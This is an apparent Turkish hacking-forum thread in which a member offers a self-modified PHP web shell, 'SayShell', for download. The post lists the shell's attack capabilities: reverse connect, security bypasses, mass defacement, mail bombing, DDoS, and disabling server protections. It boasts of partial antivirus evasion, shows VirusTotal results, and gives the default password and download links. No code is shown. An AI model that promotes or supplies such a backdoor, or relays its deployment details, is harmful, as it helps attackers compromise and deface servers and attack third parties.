İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

SayShell !

27-11-2011 19:13
#1
Üyelik tarihi:
09/2010
Nereden:
Konya
Mesajlar:
19
Teşekkür (Etti):
1
Teşekkür (Aldı):
3
Konular:
6
Ticaret:
(0) %
Selamün Aleyküm Tht Ahalisi
Bugün size kendi Editledigim Php Shelli paylaşıcam Adını SAYSHELL koydum
Kısmen Antivirüslere yakalanmaz Dosya boyutu sadece 65kb'dır
R57 Gibi KOmut bilgisi istemez ama c99 kadarda basit degildir.
İçeriginde:
File manager
Cmd Exec.
Back connect
Bypass Exec(sf-df)
Symlink
Bypass Dir.
Eval
Database Connect
Converter
Mail bomber
İnformationer
Local Dos Attacker
Backup db manager
Mass deface
Download Remote File
DDos
Yazılabilir Dizin bulucu
Serverin Güvenliklerini kapamak için oto .htaccess,php.ini editer
Ve Tabiki Kendini imha et vardır.
Biraz Türkçeleştirme yaptım Fakat tamamiyle Türkçe degildir.
Shellin id ve pass Default olarak "Sayboort" Ayarlarsınız kendinize göre md5 olarak
Virustotal sonuçları;
Antivirus Version Last Update Result
AhnLab-V32011.11.26.002011.11.26-
AntiVir7.11.18.782011.11.25PHP/WebShell.J
Antiy-AVL2.0.3.72011.11.27-
Avast6.0.1289.02011.11.27-
AVG10.0.0.11902011.11.27-
BitDefender7.22011.11.27Backdoor.PHP.AOQ
ByteHero1.0.0.12011.11.14-
CAT-
QuickHeal12.002011.11.27-
ClamAV0.97.3.02011.11.27-
Commtouch5.3.2.62011.11.26-
Comodo107902011.11.27-
DrWeb5.0.2.033002011.11.27-
Emsisoft5.1.0.112011.11.27Backdoor.PHP.WebShell!IK
eSafe7.0.17.02011.11.24-
eTrust-Vet37.0.95882011.11.25-
F-Prot4.6.5.1412011.11.26-F-Secure9.0.16440.02011.11.27Backdoor.PHP.AOQ
Fortinet4.3.370.02011.11.27-
GData22.288/22.5332011.11.27Backdoor.PHP.AOQ
IkarusT3.1.1.109.02011.11.27Backdoor.PHP.WebShell
Jiangmin13.0.9002011.11.26-
K7AntiVirus9.119.55422011.11.25-
Kaspersky9.0.0.8372011.11.27-
McAfee5.400.0.11582011.11.27-
McAfee-GW-Edition2010.1D2011.11.27-
Microsoft1.78012011.11.27-
NOD3266632011.11.27-
Norman6.07.132011.11.25-
nProtect2011-11-27.012011.11.27Backdoor.PHP.AOQ
Panda10.0.3.52011.11.27-
PCTools8.0.0.52011.11.27-
Prevx3.02011.11.27-
Rising23.85.04.012011.11.25-
Sophos4.71.02011.11.27-
SUPERAntiSpyware4.40.0.10062011.11.26-
Symantec20111.2.0.822011.11.27-
TheHacker6.7.0.1.3502011.11.27-
TrendMicro9.500.0.10082011.11.27-
TrendMicro-HouseCall9.500.0.10082011.11.27-
VBA323.12.16.42011.11.25-
VIPRE111612011.11.27-
ViRobot2011.11.26.47952011.11.27-
VirusBuster14.1.86.12011.11.26-

Download:

Dosya.tc - cretsiz, Hizli ve Kolay Dosya Paylasimi
2shared - download SayShell.rar
SayShell.rar

Kolay gelsin.. Herhangi bi sistem üzerindeki Zararlı Davranışlarda sorumlusu ben degilim.

Kullanıcı İmzası
The_Sayboort
[YOUTUBE]I-qLhJyCxBQ[/YOUTUBE]
Konu TheSayboort tarafından (02-12-2011 12:12 Saat 12:12 ) değiştirilmiştir.

25-06-2012 15:35
#2
Üyelik tarihi:
11/2011
Mesajlar:
39
Teşekkür (Etti):
6
Teşekkür (Aldı):
2
Konular:
13
Ticaret:
(0) %
Saol Abi De Upload Gitmiş Ben The_HaYaLeT48 [ Oguzhan Karaman ]

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı